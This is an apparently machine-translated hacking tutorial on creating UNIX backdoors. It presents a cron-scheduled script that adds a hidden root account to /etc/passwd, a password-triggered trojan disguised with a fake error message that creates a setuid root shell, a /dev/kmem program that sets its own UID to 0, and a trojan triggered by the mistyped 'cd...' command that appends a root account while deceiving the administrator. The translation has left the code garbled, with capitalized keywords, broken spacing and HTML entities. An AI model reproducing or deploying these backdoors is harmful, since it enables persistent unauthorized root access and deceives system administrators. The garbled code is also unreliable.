Create a UNIX backdoor (advanced)

The Crontab program is very useful for system administrators. The Cron service is used to run a scheduler at a specific time, such as month, day, week, hour, and minute. If you are smart enough, you should use it to create a "backdoor" for us "! With the Cron service, you can make it sleep at every morning .) Run the backdoor program so that you can easily enter the system to do what you want and exit the system before the network management. Put the root user's crontab file in/var/spool/crontab/root. The format is as follows:

(1) (2) (3) (4) (5) (6)
0 0 ** 3/usr/bin/updatedb

1. Minute (0-60)
2. Hour (0-23)
3. Day (1-31)
4. Month (1-12)
5. Week (1-7)
6. Programs to run

Set the program to run at every Wednesday. To create a backdoor in cron, you only need to add the backdoor program to/var/spool/crontab/root. For example, this program can check whether the user account added to the/etc/passwd file is still valid every day. The following is a program example:

0 0 ***/usr/bin/retract

<++> Backdoor/backdoor. sh
#! /Bin/csh

Set evilflag = ('grep eviluser/etc/passwd ')

If ($ # evilflag = 0) then

Set linecount = 'wc-l/etc/passwd'
Cd
Cp/etc/passwd./temppass
@ Linecount [1]/= 2
@ Linecount [1] + = 1
Split-$ linecount [1]./temppass
Echo "Meb: 0: 0: Meb:/root:/bin/sh">./xaa
Cat./xab>./xaa
Mv./xaa/etc/passwd
Chmod 644/etc/passwd
Rm./xa *./temppass
Echo Done...
Else
Endif
<-->

[Comprehensive]

Of course, we can write a trojan program and put it in the/bin directory. A suid shell is generated when running with specific command line parameters. The following is a program example:

<++> Backdoor/backdoor3.c
# Include
# Define pass "triad"
# Define BUFFERSIZE 6

Int main (argc, argv)
Int argc;
Char * argv []; {

Int I = 0;

If (argv [1]) {

If (! (Strcmp (pass, argv [1]) {

System ("cp/bin/csh/bin/. swp121 ");
System (& quot; chmod 4755/bin/. swp121 & quot ");
System ("chown root/bin/. swp121 ");
System (& quot; chmod 4755/bin/. swp121 & quot ");
}
}

Printf ("372f: Invalid control argument, unable to initialize. Retrying ");
For (; I <10; I ++ ){
Fprintf (stderr ,".");
Sleep (1 );
}
Printf ("\ nAction aborted after 10 attempts. \ n ");
Return (0 );
}
<-->

[Variant]

The following program searches for the UID of the program you run in the memory and changes it to 0, so that you have a suid root shell.

<++> Backdoor/kmemthief. c
# Include
# Include
# Include
# Include
# Include
# Include
# Include

# Define pass "triad"

Struct user userpage;
Long address (), userlocation;

Int main (argc, argv, envp)
Int argc;
Char * argv [], * envp []; {

Int count, fd;
Long where, lseek ();

If (argv [1]) {
If (! (Strcmp (pass, argv [1]) {
Fd = (open ("/dev/kmem", O_RDWR );

If (fd <0 ){
Printf ("Cannot read or write
/Dev/kmem \ n ");
Perror (argv );
Exit (10 );
}

Userlocation = address ();
Where = (lseek (fd, userlocation, 0 );

If (where! = Userlocation ){
Printf ("Cannot seek to user page \ n ");
Perror (argv );
Exit (20 );
}

Count = read (fd, & userpage, sizeof (struct user ));

If (count! = Sizeof (struct user )){
Printf ("Cannot read user page \ n ");
Perror (argv );
Exit (30 );
}

Printf ("Current UID: % d \ n", userpage. u_ruid );
Printf ("Current GID: % d \ n", userpage. g_ruid );

Userpage. u_ruid = 0;
Userpage. u_rgid = 0;

Where = lseek (fd, userlocation, 0 );

If (where! = Userlocation ){
Printf ("Cannot seek to user page \ n ");
Perror (argv );
Exit (40 );
}

Write (fd, & userpage, (char *) & (userpage. u_procp)-(char *) & userpage ));

Execle ("/bin/csh", "/bin/csh", "-I", (char *) 0, envp );
}
}

}
<-->

["Stupid" method]

Have you ever tried to input "cd..." as "cd..." in a UNIX system .."? This is due to the habit of using MS Windows and MS-DOS. Will the network administrator also make this mistake? If so, can he make some "contribution" for us? :) For example, when he enters "cd...", our Trojan program will be activated. In this way, we do not have to log on to the system to activate the Trojan. The following is a program example:

<++> Backdoor/dumb. c
/*
This program can add a UID 0 account to the/etc/passwd file when the Administrator accidentally enters cd. But at the same time, it also implements the cd... function, thus deceiving the administrator.
*/

# Include
# Include

Main ()
{
FILE * fd;
Fd = fopen ("/etc/passwd", "a + ");
Fprintf (fd, "hax0r: 0: 0:/root:/bin/sh \ n ");
System ("cd ");
}
<-->